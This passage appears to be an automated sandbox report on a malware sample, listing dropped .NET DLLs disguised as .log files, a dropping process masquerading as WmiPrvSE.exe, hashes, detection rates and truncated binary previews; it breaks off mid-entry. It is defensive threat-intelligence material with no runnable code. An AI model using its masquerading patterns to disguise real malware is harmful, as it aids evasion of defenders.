Download File

Process:	C:\Users\user\Desktop\9D7RwuJrth.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	34816
Entropy (8bit):	5.636032516496583
Encrypted:	false
SSDEEP:	384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
MD5:	996BD447A16F0A20F238A611484AFE86
SHA1:	CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
SHA-256:	0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
SHA-512:	80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 21%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\YqcMQKie.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	41472
Entropy (8bit):	5.6808219961645605
Encrypted:	false
SSDEEP:	768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
MD5:	6CD78D07F9BD4FECC55CDB392BC5EC89
SHA1:	094DE32070BED60A811D983740509054AD017CE4
SHA-256:	16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
SHA-512:	5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................... ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........s...D...........r............................................................................................................................................................................9..A..%+..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\YrKlkCVM.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\YvkCHKYH.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	38912
Entropy (8bit):	5.679286635687991
Encrypted:	false
SSDEEP:	768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
MD5:	9E910782CA3E88B3F87826609A21A54E
SHA1:	8DBC333244620EDA5D3F1C9EAA6B924455262303
SHA-256:	3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
SHA-512:	592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\ZDFmwSFw.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	34304
Entropy (8bit):	5.618776214605176
Encrypted:	false
SSDEEP:	768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
MD5:	9B25959D6CD6097C0EF36D2496876249
SHA1:	535B4D0576746D88537D4E9B01353210D893F4D2
SHA-256:	4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
SHA-512:	C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t\|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\ZELbGgFk.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	50176
Entropy (8bit):	5.723168999026349
Encrypted:	false
SSDEEP:	768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
MD5:	2E116FC64103D0F0CF47890FD571561E
SHA1:	3EF08A9B057D1876C24FC76E937CDA461FAC6071
SHA-256:	25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
SHA-512:	39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 21%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\ZOCRVjRy.log

Download File

Process:	C:\Users\user\Desktop\9D7RwuJrth.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	34304
Entropy (8bit):	5.618776214605176
Encrypted:	false
SSDEEP:	768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
MD5:	9B25959D6CD6097C0EF36D2496876249
SHA1:	535B4D0576746D88537D4E9B01353210D893F4D2
SHA-256:	4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
SHA-512:	C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t\|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\ZRpBnocC.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 24%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\ZWwCXoEW.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	50176
Entropy (8bit):	5.723168999026349
Encrypted:	false
SSDEEP:	768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
MD5:	2E116FC64103D0F0CF47890FD571561E
SHA1:	3EF08A9B057D1876C24FC76E937CDA461FAC6071
SHA-256:	25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
SHA-512:	39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 21%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\aOwTdXyg.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	33792
Entropy (8bit):	5.541771649974822
Encrypted:	false
SSDEEP:	768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
MD5:	2D6975FD1CC3774916D8FF75C449EE7B
SHA1:	0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
SHA-256:	75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
SHA-512:	6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 29%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....\|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...\|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\aghuugwS.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\bHyKcPKg.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	342528
Entropy (8bit):	6.170134230759619
Encrypted:	false
SSDEEP:	3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
MD5:	9DADB5C8A6FD5020275C31EE6BC61D63
SHA1:	ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
SHA-256:	80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
SHA-512:	EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\bXhLAPqc.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	33792
Entropy (8bit):	5.541771649974822
Encrypted:	false
SSDEEP:	768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
MD5:	2D6975FD1CC3774916D8FF75C449EE7B
SHA1:	0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
SHA-256:	75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
SHA-512:	6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....\|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...\|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\brYbblpC.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	294912
Entropy (8bit):	6.010605469502259
Encrypted:	false
SSDEEP:	6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
MD5:	00574FB20124EAFD40DC945EC86CA59C
SHA1:	8B96C4B6F450E711085AE7B22517C195222ACFDF
SHA-256:	3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
SHA-512:	B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

C:\Users\user\Desktop\cItldMID.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	41472
Entropy (8bit):	5.6808219961645605
Encrypted:	false
SSDEEP:	768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
MD5:	6CD78D07F9BD4FECC55CDB392BC5EC89
SHA1:	094DE32070BED60A811D983740509054AD017CE4
SHA-256:	16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
SHA-512:	5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................... ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........s...D...........r............................................................................................................................................................................9..A..%+..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\cLlTmcma.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\cvCSNcGe.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\czckklIZ.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	41472
Entropy (8bit):	5.6808219961645605
Encrypted:	false
SSDEEP:	768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
MD5:	6CD78D07F9BD4FECC55CDB392BC5EC89
SHA1:	094DE32070BED60A811D983740509054AD017CE4
SHA-256:	16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
SHA-512:	5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................... ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........s...D...........r............................................................................................................................................................................9..A..%+..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\dVAarBMu.log

Download File

Process:	C:\Users\user\Desktop\9D7RwuJrth.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	342528
Entropy (8bit):	6.170134230759619
Encrypted:	false
SSDEEP:	3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
MD5:	9DADB5C8A6FD5020275C31EE6BC61D63
SHA1:	ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
SHA-256:	80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
SHA-512:	EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\decjNzkA.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	50176
Entropy (8bit):	5.723168999026349
Encrypted:	false
SSDEEP:	768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
MD5:	2E116FC64103D0F0CF47890FD571561E
SHA1:	3EF08A9B057D1876C24FC76E937CDA461FAC6071
SHA-256:	25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
SHA-512:	39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\dsdajcUY.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	34816
Entropy (8bit):	5.636032516496583
Encrypted:	false
SSDEEP:	384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
MD5:	996BD447A16F0A20F238A611484AFE86
SHA1:	CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
SHA-256:	0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
SHA-512:	80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\eJEjcPHs.log

Download File

Process:	C:\Users\user\Desktop\9D7RwuJrth.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\eNYCHMrV.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	41472
Entropy (8bit):	5.6808219961645605
Encrypted:	false
SSDEEP:	768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
MD5:	6CD78D07F9BD4FECC55CDB392BC5EC89
